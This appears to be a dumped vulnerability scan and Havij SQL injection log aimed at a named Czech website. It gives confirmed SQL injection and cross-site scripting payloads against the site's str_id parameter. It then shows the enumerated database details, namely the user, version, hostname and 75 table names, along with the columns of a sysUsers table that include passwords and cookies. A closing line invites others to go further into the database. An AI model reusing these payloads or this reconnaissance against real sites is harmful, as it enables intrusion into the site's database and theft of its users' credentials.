- ||| SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: str_id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.azd.cz/?str_id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: str_id
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.azd.cz/?str_id='"--></style></script><script>alert(0x001AFA)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: str_id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x001AFA)</script>
- ||| Database Error Message
- Severity: Low
- Confirmation: Confirmed
- URL: http://www.azd.cz/?str_id=%27
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Parameter Name: str_id
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| MySQL Database Identified
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Parameter Name: str_id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| E-mail Address Disclosure
- Severity: Information
- Confirmation: Confirmed
- Found E-mails:
- ||| Test - Havij
- Small warning! (The program did not load data or items are not in any database data :D)
- Target: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- DB Server: MySQL
- Resp. Time(avg): 3243 ms
- Current User: azd_cz@localhost
- DBMS Version: 5.0.89
- Current DB: azd_cz_db
- System User: azd_cz@localhost
- Host Name: doyle.netservis.cz
- DB User: 'azd_cz'@'localhost'
- Data Bases: information_schema, azd_cz_db
- Keyword defined by user: Duplicate
- Injection type is Integer
- Current DB: azd_cz_db
- Count(table_name) of information_schema.tables where table_schema=0x617A645F637A5F6462 is 75
- Table found: archAnkety
- Table found: pages
- Table found: pages_language_overlay
- Table found: refKML
- Table found: sysEmaily
- Table found: sysFoots
- Table found: sysPageMenu
- Table found: sysPhotos
- Table found: sysStyles
- Table found: sysUsers
- Table found: sys_refindex
- Table found: tabAkce
- Table found: tabAkce_meta
- Table found: tabAktuality
- Table found: tabAnkety
- Table found: tabAnketyMoznosti
- Table found: tabAntiBF
- Table found: tabCache
- Table found: tabCacheURL
- Table found: tabClanky
- Table found: tabConfig
- Table found: tabDPH
- Table found: tabDiskuse
- Table found: tabDiskusePrispevky
- Table found: tabEmaily
- Table found: tabFormulare
- Table found: tabFormulareEmaily
- Table found: tabFormulareOdeslane
- Table found: tabFormularePole
- Table found: tabFormulareStranky
- Table found: tabFotografie
- Table found: tabGM
- Table found: tabGMbod
- Table found: tabGMtypBodu
- Table found: tabHP
- Table found: tabKatalogy
- Table found: tabLanguages
- Table found: tabModuly
- Table found: tabNewsletter
- Table found: tabObrazky
- Table found: tabOperace
- Table found: tabOpravneni
- Table found: tabOpravneniDefinice
- Table found: tabPrihlaseni
- Table found: tabProdukty
- Table found: tabProduktySoubory
- Table found: tabReWriteID
- Table found: tabRegistrovani
- Table found: tabRssMirror
- Table found: tabStatistikaFulltext
- Table found: tabStranky
- Table found: tabStranky2
- Table found: tabVideoNastaveni
- Table found: tabVyrazy
- Table found: tabVyrazyPreklad
- Table found: tieAkceSouvisejici
- Table found: tieAkceSouvisejiciClanky
- Table found: tieClankySouvisejici
- Table found: tieNewsletterAkceEmaily
- Table found: tieNewsletterClanky
- Table found: tieOpravneniModuly
- Table found: tieOpravneniStranky
- Table found: tieOpravneniUzivatele
- Table found: tieProduktySouvisejici
- Table found: tieRoleUzivatele
- Table found: tieStrankyAkce
- Table found: tieStrankyAktuality
- Table found: tieStrankyClanky
- Table found: tieStrankyProdukty
- Table found: tt_content
- Table found: tt_news
- Table found: tx_dam
- Table found: tx_dam_cat
- Table found: tx_dam_mm_cat
- Table found: viewStrankyNadrazene
- azd_cz_db.sysUsers
- Count(column_name) of information_schema.columns where table_schema=0x617A645F637A5F6462 and table_name=0x7379735573657273 is 17
- Column found: ID
- Column found: User
- Column found: Password
- Column found: Name
- Column found: LName
- Column found: Phone
- Column found: Email
- Column found: Active
- Column found: NTAdmin
- Column found: Registrace
- Column found: Od
- Column found: Do
- Column found: Access
- Column found: LastIP
- Column found: LastCookie
- Column found: Login
- Column found: Poznamka
- For more fortune to the database for you ..